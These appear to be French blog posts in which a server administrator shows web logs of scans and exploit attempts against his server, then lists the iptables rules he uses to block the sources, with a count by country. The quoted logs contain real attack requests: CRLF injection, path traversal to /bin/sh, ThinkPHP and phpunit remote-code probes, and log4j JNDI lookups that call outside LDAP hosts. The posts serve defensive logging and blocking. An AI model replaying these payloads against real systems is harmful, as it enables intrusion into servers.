Nuclei – Open-source project

24 x served & 1 x viewed

J’ai vu ce logs :

104.168.102.21 - - [17/Jan/2022:00:20:25 +0100] "GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1" 302 5553 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"

Mon reflexe :

iptables -A INPUT -s 104.168.102.21 -j DROP

Logs d’une attaque IP de la Russie (45.146.165.37)

75 x served & 16 x viewed

C’est espacé dans le temps afin de ne pas être bloqué.
Voici les logs :

45.146.165.37 - - [04/Jan/2022:00:09:45 +0100] "GET / HTTP/1.1" 302 5557 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:00:09:52 +0100] "GET /user/auth/login HTTP/1.1" 200 13390 "https://80.15.48.50:443/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:01:41:03 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 5635 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:03:24:01 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:03:24:01 +0100] "GET /user/auth/login HTTP/1.1" 200 8198 "http://80.15.48.50:80/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:03:57:36 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:03:57:50 +0100] "GET /user/auth/login HTTP/1.1" 200 8198 "http://80.15.48.50:80/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:04:14:43 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:04:14:43 +0100] "GET /user/auth/login HTTP/1.1" 200 8198 "http://80.15.48.50:80/solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:04:59:21 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:04:59:22 +0100] "GET /user/auth/login HTTP/1.1" 200 8193 "http://80.15.48.50:80/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:05:56:50 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:05:56:51 +0100] "GET /user/auth/login HTTP/1.1" 200 8195 "http://80.15.48.50:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:07:45:21 +0100] "GET /_ignition/execute-solution HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:07:45:22 +0100] "GET /user/auth/login HTTP/1.1" 200 8194 "http://80.15.48.50:80/_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:08:44:47 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 485 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:09:07:16 +0100] "GET / HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:09:07:17 +0100] "GET /user/auth/login HTTP/1.1" 200 8198 "http://80.15.48.50:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:09:47:57 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 5369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:11:53:49 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 5557 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:13:06:48 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 5557 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:13:07:05 +0100] "GET /user/auth/login HTTP/1.1" 200 13388 "https://80.15.48.50:443/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:13:52:16 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 302 5369 "https://80.15.48.50:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

Ce qu’il faut faire:

iptables -A INPUT -s 45.146.165.37 -j DROP

Liste des IP bloqués via /etc/iptables/rules.v4

129 x served & 1 x viewed

Voici la liste des IP que je bloque :

# cat /etc/iptables/rules.v4 | grep "\-j DROP"
-A INPUT -s 112.126.90.41/32 -j DROP
-A INPUT -s 116.147.2.110/32 -j DROP
-A INPUT -s 122.14.209.13/32 -j DROP
-A INPUT -s 158.69.13.199/32 -j DROP
-A INPUT -s 193.112.88.67/32 -j DROP
-A INPUT -s 210.21.218.26/32 -j DROP
-A INPUT -s 223.75.249.2/32 -j DROP
-A INPUT -s 27.50.160.35/32 -j DROP
-A INPUT -s 49.233.63.234/32 -j DROP
-A INPUT -s 91.242.37.16/32 -j DROP
-A INPUT -s 103.87.167.253/32 -j DROP
-A INPUT -s 113.160.229.252/32 -j DROP
-A INPUT -s 123.201.235.83/32 -j DROP
-A INPUT -s 156.221.147.68/32 -j DROP
-A INPUT -s 171.236.213.49/32 -j DROP
-A INPUT -s 176.240.226.165/32 -j DROP
-A INPUT -s 202.90.133.210/32 -j DROP
-A INPUT -s 216.104.201.88/32 -j DROP
-A INPUT -s 175.172.174.191/32 -j DROP
-A INPUT -s 123.132.65.176/32 -j DROP
-A INPUT -s 103.145.13.43/32 -j DROP
-A INPUT -s 175.21.153.128/32 -j DROP
-A INPUT -s 178.63.34.189/32 -j DROP
-A INPUT -s 74.120.14.36/32 -j DROP
-A INPUT -s 34.240.212.8/32 -j DROP
-A INPUT -s 167.248.133.52/32 -j DROP
-A INPUT -s 162.142.125.52/32 -j DROP
-A INPUT -s 197.53.220.102/32 -j DROP
-A INPUT -s 134.209.87.169/32 -j DROP
-A INPUT -s 66.151.211.226/32 -j DROP
-A INPUT -s 61.40.0.0/16 -j DROP
-A INPUT -s 66.210.251.136/32 -j DROP
-A INPUT -s 202.215.160.75/32 -j DROP
-A INPUT -s 81.68.159.121/32 -j DROP
-A INPUT -s 178.129.246.3/32 -j DROP
-A INPUT -s 46.209.56.107/32 -j DROP
-A INPUT -s 156.197.215.223/32 -j DROP
-A INPUT -s 156.216.50.199/32 -j DROP
-A INPUT -s 192.241.224.104/32 -j DROP
-A INPUT -s 192.241.206.242/32 -j DROP
-A INPUT -s 216.245.193.22/32 -j DROP
-A INPUT -s 36.27.208.157/32 -j DROP
-A INPUT -s 81.68.106.157/32 -j DROP
-A INPUT -s 143.110.212.186/32 -j DROP
-A INPUT -s 54.39.22.135/32 -j DROP
-A INPUT -s 62.171.179.56/32 -j DROP
-A INPUT -s 93.113.111.100/32 -j DROP
-A INPUT -s 103.241.205.1/32 -j DROP
-A INPUT -s 128.199.122.54/32 -j DROP
-A INPUT -s 139.162.7.223/32 -j DROP
-A INPUT -s 139.59.58.116/32 -j DROP
-A INPUT -s 159.89.109.162/32 -j DROP
-A INPUT -s 201.143.63.92/32 -j DROP
-A INPUT -s 202.169.26.237/32 -j DROP
-A INPUT -s 206.189.93.93/32 -j DROP
-A INPUT -s 211.43.12.188/32 -j DROP
-A INPUT -s 123.172.67.122/32 -j DROP
-A INPUT -s 3.8.12.221/32 -j DROP
-A INPUT -s 34.237.4.205/32 -j DROP
-A INPUT -s 34.230.156.67/32 -j DROP
-A INPUT -s 3.142.196.207/32 -j DROP
-A INPUT -s 185.246.209.147/32 -j DROP
-A INPUT -s 18.231.94.162/32 -j DROP
-A INPUT -s 173.212.219.223/32 -j DROP
-A INPUT -s 139.224.198.47/32 -j DROP
-A INPUT -s 13.232.100.135/32 -j DROP
-A INPUT -s 125.64.94.221/32 -j DROP
-A INPUT -s 121.5.250.245/32 -j DROP
-A INPUT -s 114.70.235.43/32 -j DROP
-A INPUT -s 101.255.122.146/32 -j DROP
-A INPUT -s 5.188.210.227/32 -j DROP
-A INPUT -s 37.49.229.222/32 -j DROP
-A INPUT -s 34.237.4.205/32 -j DROP
-A INPUT -s 193.46.255.92/32 -j DROP
-A INPUT -s 165.227.84.219/32 -j DROP
-A INPUT -s 165.22.232.189/32 -j DROP
-A INPUT -s 5.8.10.202/32 -j DROP
-A INPUT -s 5.188.210.227/32 -j DROP
-A INPUT -s 222.77.181.28/32 -j DROP
-A INPUT -s 125.64.94.221/32 -j DROP
-A INPUT -s 108.168.131.251/32 -j DROP
-A INPUT -s 79.143.86.189/32 -j DROP
-A INPUT -s 125.64.94.214/32 -j DROP
-A INPUT -s 139.162.226.13/32 -j DROP
-A INPUT -s 45.146.164.125/32 -j DROP
-A INPUT -s 45.146.164.131/32 -j DROP
-A INPUT -s 45.155.205.109/32 -j DROP
-A INPUT -s 45.155.205.181/32 -j DROP
-A INPUT -s 45.155.205.196/32 -j DROP
-A INPUT -s 123.58.4.233/32 -j DROP
-A INPUT -s 45.15.18.3/32 -j DROP
-A INPUT -s 49.143.32.6/32 -j DROP
-A INPUT -s 84.17.42.11/32 -j DROP
-A INPUT -s 101.0.54.165/32 -j DROP
-A INPUT -s 113.220.18.13/32 -j DROP
-A INPUT -s 151.106.8.41/32 -j DROP
-A INPUT -s 182.119.98.177/32 -j DROP
-A INPUT -s 103.91.80.2/32 -j DROP
-A INPUT -s 120.52.152.3/32 -j DROP
-A INPUT -s 45.14.149.244/32 -j DROP
-A INPUT -s 209.141.33.232/32 -j DROP
-A INPUT -s 68.150.109.112/32 -j DROP
-A INPUT -s 114.33.156.230/32 -j DROP
-A INPUT -s 59.63.206.200/32 -j DROP
-A INPUT -s 59.97.193.131/32 -j DROP
-A INPUT -s 117.241.51.177/32 -j DROP
-A INPUT -s 119.123.236.177/32 -j DROP
-A INPUT -s 27.5.37.175/32 -j DROP
-A INPUT -s 27.45.11.127/32 -j DROP
-A INPUT -s 61.242.40.137/32 -j DROP
-A INPUT -s 182.121.231.1/32 -j DROP
-A INPUT -s 2.57.122.53/32 -j DROP
-A INPUT -s 2.57.122.53/32 -j DROP
-A INPUT -s 3.19.213.88/32 -j DROP
-A INPUT -s 20.199.123.240/32 -j DROP
-A INPUT -s 20.68.241.118/32 -j DROP
-A INPUT -s 23.101.199.109/32 -j DROP
-A INPUT -s 35.202.212.64/32 -j DROP
-A INPUT -s 40.121.11.29/32 -j DROP
-A INPUT -s 40.87.87.96/32 -j DROP
-A INPUT -s 40.89.150.92/32 -j DROP
-A INPUT -s 45.77.214.38/32 -j DROP
-A INPUT -s 51.141.166.84/32 -j DROP
-A INPUT -s 51.210.137.28/32 -j DROP
-A INPUT -s 52.149.128.42/32 -j DROP
-A INPUT -s 52.175.210.216/32 -j DROP
-A INPUT -s 52.249.196.150/32 -j DROP
-A INPUT -s 80.241.212.242/32 -j DROP
-A INPUT -s 104.154.217.152/32 -j DROP
-A INPUT -s 104.198.135.4/32 -j DROP
-A INPUT -s 108.59.10.20/32 -j DROP
-A INPUT -s 115.78.14.240/32 -j DROP
-A INPUT -s 118.101.194.141/32 -j DROP
-A INPUT -s 128.31.0.13/32 -j DROP
-A INPUT -s 134.119.189.155/32 -j DROP
-A INPUT -s 144.202.53.77/32 -j DROP
-A INPUT -s 148.64.121.254/32 -j DROP
-A INPUT -s 149.28.84.31/32 -j DROP
-A INPUT -s 157.245.77.151/32 -j DROP
-A INPUT -s 172.93.128.215/32 -j DROP
-A INPUT -s 178.128.104.205/32 -j DROP
-A INPUT -s 189.203.106.65/32 -j DROP
-A INPUT -s 190.83.155.186/32 -j DROP
-A INPUT -s 192.46.223.53/32 -j DROP
-A INPUT -s 193.111.76.162/32 -j DROP
-A INPUT -s 194.116.73.192/32 -j DROP
-A INPUT -s 199.117.154.162/32 -j DROP
-A INPUT -s 210.66.16.184/32 -j DROP
-A INPUT -s 212.154.7.246/32 -j DROP
-A INPUT -s 80.82.77.139/32 -j DROP
-A INPUT -s 80.82.77.33/32 -j DROP
-A INPUT -s 125.64.94.138/32 -j DROP
-A INPUT -s 185.142.236.35/32 -j DROP
-A INPUT -s 185.142.236.40/32 -j DROP
-A INPUT -s 185.142.236.43/32 -j DROP
-A INPUT -s 23.95.132.55/32 -j DROP
-A INPUT -s 23.95.191.212/32 -j DROP
-A INPUT -s 27.40.100.96/32 -j DROP
-A INPUT -s 42.235.98.126/32 -j DROP
-A INPUT -s 42.237.215.13/32 -j DROP
-A INPUT -s 45.229.54.120/32 -j DROP
-A INPUT -s 59.99.47.115/32 -j DROP
-A INPUT -s 115.50.246.211/32 -j DROP
-A INPUT -s 178.175.102.79/32 -j DROP
-A INPUT -s 180.188.249.125/32 -j DROP
-A INPUT -s 198.23.172.233/32 -j DROP
-A INPUT -s 221.15.171.118/32 -j DROP
-A INPUT -s 222.97.172.100/32 -j DROP
-A INPUT -s 45.146.165.123/32 -j DROP
-A INPUT -s 45.146.165.123/32 -j DROP
-A INPUT -s 189.72.251.188/32 -j DROP
-A INPUT -s 195.47.196.114/32 -j DROP
-A INPUT -s 62.171.164.100/32 -j DROP
-A INPUT -s 93.174.89.216/32 -j DROP
-A INPUT -s 103.145.13.120/32 -j DROP
-A INPUT -s 111.59.6.79/32 -j DROP
-A INPUT -s 116.24.189.232/32 -j DROP
-A INPUT -s 125.41.13.162/32 -j DROP
-A INPUT -s 125.44.215.247/32 -j DROP
-A INPUT -s 134.122.43.75/32 -j DROP
-A INPUT -s 136.144.41.150/32 -j DROP
-A INPUT -s 143.110.208.55/32 -j DROP
-A INPUT -s 143.198.235.203/32 -j DROP
-A INPUT -s 143.198.66.250/32 -j DROP
-A INPUT -s 147.182.179.241/32 -j DROP
-A INPUT -s 147.182.179.242/32 -j DROP
-A INPUT -s 147.182.179.243/32 -j DROP
-A INPUT -s 147.182.179.244/32 -j DROP
-A INPUT -s 147.182.179.245/32 -j DROP
-A INPUT -s 165.227.42.8/32 -j DROP
-A INPUT -s 165.232.146.19/32 -j DROP
-A INPUT -s 167.99.184.39/32 -j DROP
-A INPUT -s 167.99.189.51/32 -j DROP
-A INPUT -s 205.185.115.135/32 -j DROP
-A INPUT -s 209.141.41.11/32 -j DROP
-A INPUT -s 209.141.41.98/32 -j DROP
-A INPUT -s 209.141.50.63/32 -j DROP
-A INPUT -s 209.141.54.8/32 -j DROP
-A INPUT -s 13.52.99.132/32 -j DROP
-A INPUT -s 92.154.95.236/32 -j DROP
-A INPUT -s 192.241.202.155/32 -j DROP
-A INPUT -s 192.241.202.30/32 -j DROP
-A INPUT -s 192.241.204.132/32 -j DROP
-A INPUT -s 192.241.206.232/32 -j DROP
-A INPUT -s 192.241.208.28/32 -j DROP
-A INPUT -s 192.241.209.114/32 -j DROP
-A INPUT -s 192.241.210.206/32 -j DROP
-A INPUT -s 192.241.210.44/32 -j DROP
-A INPUT -s 192.241.218.70/32 -j DROP
-A INPUT -s 192.241.219.54/32 -j DROP
-A INPUT -s 192.241.221.104/32 -j DROP
-A INPUT -s 192.241.221.238/32 -j DROP
-A INPUT -s 192.241.221.249/32 -j DROP
-A INPUT -s 192.227.134.73/32 -j DROP
-A INPUT -s 45.146.164.110/32 -j DROP
-A INPUT -s 192.241.197.168/32 -j DROP
-A INPUT -s 192.241.208.45/32 -j DROP
-A INPUT -s 192.241.209.206/32 -j DROP
-A INPUT -s 192.241.210.112/32 -j DROP
-A INPUT -s 192.241.210.26/32 -j DROP
-A INPUT -s 192.241.211.59/32 -j DROP
-A INPUT -s 192.241.211.81/32 -j DROP
-A INPUT -s 192.241.211.83/32 -j DROP
-A INPUT -s 192.241.212.191/32 -j DROP
-A INPUT -s 192.241.219.62/32 -j DROP
-A INPUT -s 192.241.221.181/32 -j DROP
-A INPUT -s 192.241.223.182/32 -j DROP
-A INPUT -s 192.241.223.191/32 -j DROP
-A INPUT -s 192.241.212.111/32 -j DROP
-A INPUT -s 217.112.83.246/32 -j DROP
-A INPUT -s 91.132.58.30/32 -j DROP
-A INPUT -s 1.177.46.68/32 -j DROP
-A INPUT -s 77.107.1.240/32 -j DROP
-A INPUT -s 173.168.70.45/32 -j DROP
-A INPUT -s 121.5.155.158/32 -j DROP
-A INPUT -s 198.98.56.220/32 -j DROP
-A INPUT -s 199.195.251.213/32 -j DROP
-A INPUT -s 199.195.253.71/32 -j DROP
-A INPUT -s 209.141.56.41/32 -j DROP
-A INPUT -s 192.241.198.125/32 -j DROP
-A INPUT -s 192.241.205.65/32 -j DROP
-A INPUT -s 192.241.208.235/32 -j DROP
-A INPUT -s 192.241.209.26/32 -j DROP
-A INPUT -s 192.241.204.152/32 -j DROP
-A INPUT -s 185.239.242.117/32 -j DROP
-A INPUT -s 198.12.85.84/32 -j DROP
-A INPUT -s 209.141.56.212/32 -j DROP
-A INPUT -s 209.141.62.185/32 -j DROP
-A INPUT -s 27.120.170.139/32 -j DROP
-A INPUT -s 192.241.204.32/32 -j DROP
-A INPUT -s 192.241.198.123/32 -j DROP
-A INPUT -s 45.146.166.156/32 -j DROP
-A INPUT -s 89.248.165.23/32 -j DROP
-A INPUT -s 45.141.87.54/32 -j DROP
-A INPUT -s 185.193.88.50/32 -j DROP
-A INPUT -s 125.43.243.4/32 -j DROP
-A INPUT -s 200.37.200.185/32 -j DROP
-A INPUT -s 183.136.225.42/32 -j DROP
-A INPUT -s 121.46.25.189/32 -j DROP
-A INPUT -s 50.31.21.6/32 -j DROP
-A INPUT -s 50.31.21.6/32 -j DROP
-A INPUT -s 134.255.233.173/32 -j DROP
-A INPUT -s 112.27.124.140/32 -j DROP
-A INPUT -s 45.6.195.248/32 -j DROP
-A INPUT -s 192.241.198.231/32 -j DROP
-A INPUT -s 192.241.206.102/32 -j DROP
-A INPUT -s 137.184.197.210/32 -j DROP
-A INPUT -s 137.184.197.210/32 -j DROP
-A INPUT -s 167.71.13.196/32 -j DROP
-A INPUT -s 45.93.201.33/32 -j DROP
-A INPUT -s 192.241.208.5/32 -j DROP
-A INPUT -s 94.102.49.159/32 -j DROP
-A INPUT -s 106.13.90.51/32 -j DROP
-A INPUT -s 87.96.130.53/32 -j DROP
-A INPUT -s 209.141.51.171/32 -j DROP
-A INPUT -s 34.86.35.13/32 -j DROP
-A INPUT -s 89.248.165.73/32 -j DROP
-A INPUT -s 178.239.21.201/32 -j DROP
-A INPUT -s 94.189.47.234/32 -j DROP
-A INPUT -s 192.241.202.99/32 -j DROP
-A INPUT -s 159.223.5.5/32 -j DROP
-A INPUT -s 161.97.87.64/32 -j DROP
-A INPUT -s 120.86.239.154/32 -j DROP
-A INPUT -s 192.241.199.130/32 -j DROP
-A INPUT -s 109.237.103.118/32 -j DROP
-A INPUT -s 137.184.202.162/32 -j DROP
-A INPUT -s 95.130.176.18/32 -j DROP
-A INPUT -s 185.53.90.24/32 -j DROP
-A INPUT -s 91.234.62.239/32 -j DROP
-A INPUT -s 178.239.21.162/32 -j DROP
-A INPUT -s 209.141.54.186/32 -j DROP
-A INPUT -s 192.241.200.172/32 -j DROP
-A INPUT -s 79.138.10.109/32 -j DROP
-A INPUT -s 144.76.137.254/32 -j DROP
-A INPUT -s 192.151.157.210/32 -j DROP
-A INPUT -s 95.91.75.28/32 -j DROP
-A INPUT -s 5.9.138.189/32 -j DROP
-A INPUT -s 45.81.235.112/32 -j DROP
-A INPUT -s 192.241.207.72/32 -j DROP
-A INPUT -s 192.241.214.159/32 -j DROP
-A INPUT -s 195.54.160.149/32 -j DROP
-A INPUT -s 47.242.78.107/32 -j DROP
-A INPUT -s 170.210.45.163/32 -j DROP
-A INPUT -s 139.59.70.139/32 -j DROP
-A INPUT -s 199.193.97.11/32 -j DROP
-A INPUT -s 208.100.26.229/32 -j DROP
-A INPUT -s 24.151.40.195/32 -j DROP
-A INPUT -s 24.54.56.243/32 -j DROP
-A INPUT -s 34.105.221.29/32 -j DROP
-A INPUT -s 34.118.91.198/32 -j DROP
-A INPUT -s 34.77.120.149/32 -j DROP
-A INPUT -s 35.246.93.126/32 -j DROP
-A INPUT -s 47.214.121.207/32 -j DROP
-A INPUT -s 64.68.228.64/32 -j DROP
-A INPUT -s 89.240.192.186/32 -j DROP
-A INPUT -s 220.198.209.4/32 -j DROP
-A INPUT -s 23.183.83.18/32 -j DROP
-A INPUT -s 111.13.127.129/32 -j DROP
-A INPUT -s 45.83.66.99/32 -j DROP
-A INPUT -s 34.142.51.138/32 -j DROP
-A INPUT -s 23.183.83.160/32 -j DROP
-A INPUT -s 89.248.165.52/32 -j DROP
-A INPUT -s 20.211.30.34/32 -j DROP
-A INPUT -s 172.104.131.24/32 -j DROP
-A LOG_DROP -j DROP

Ce qui donne par pays :

#  cat /etc/iptables/rules.v4 | grep "DROP" | awk '{print $4}' | sed 's/\// /g' | awk '{print $1}' | xargs -n 1 geoiplookup { } | sort | uniq -c | sort -n | sed -r 's/ GeoIP Country Edition://g'
      1 AL, Albania
      1 AR, Argentina
      1 AT, Austria
      1 CZ, Czech Republic
      1 DK, Denmark
      1 GR, Greece
      1 IE, Ireland
      1 MD, Moldova, Republic of
      1 PE, Peru
      1 PH, Philippines
      1 TT, Trinidad and Tobago
      1 UG, Uganda
      2 BA, Bosnia and Herzegovina
      2 ID, Indonesia
      2 IR, Iran, Islamic Republic of
      2 IT, Italy
      2 JP, Japan
      2 MX, Mexico
      2 MY, Malaysia
      2 SG, Singapore
      2 TR, Turkey
      2 TW, Taiwan
      3 SE, Sweden
      3 VN, Vietnam
      4 BR, Brazil
      4 EG, Egypt
      5 FR, France
      6 GB, United Kingdom
      6 KR, Korea, Republic of
      7 CA, Canada
      7 SC, Seychelles
      8 NL, Netherlands
      9 DE, Germany
     10 RU, Russian Federation
     12 IN, India
     22 IP Address not found
     47 CN, China
    139 US, United States

USA first …. Misère.

Audit des IP qui font des attaques log4j

110 x served & 71 x viewed

Petite recherche dans les logs :

170.210.45.163 - - [16/Dec/2021:06:19:46 +0100] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 302 5113 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [16/Dec/2021:06:19:46 +0100] "GET / HTTP/1.1" 302 5113 "-" "${jndi:ldap://185.224.139.151:1389/Exploit}"
139.59.70.139 - - [16/Dec/2021:12:36:32 +0100] "GET / HTTP/1.0" 301 558 "${jndi:ldap://159.223.5.30:1389/a}" "nimaps/1.1 ${jndi:ldap://159.223.5.30:1389/a}"

J’ai donc bloqué les IPs :

# iptables -A INPUT -s 170.210.45.163 -j DROP
# iptables -A INPUT -s 139.59.70.139 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Misère.

IP Address Country Region City
170.210.45.163 Argentina Ciudad Autonoma de Buenos Aires Buenos Aires
ISP Organization Latitude Longitude
Red de Interconexion Universitaria Not Available -34.6132 -58.3772
IP Address Country Region City
139.59.70.139 India Karnataka Bengaluru
ISP Organization Latitude Longitude
DigitalOcean LLC Not Available 12.9762 77.6033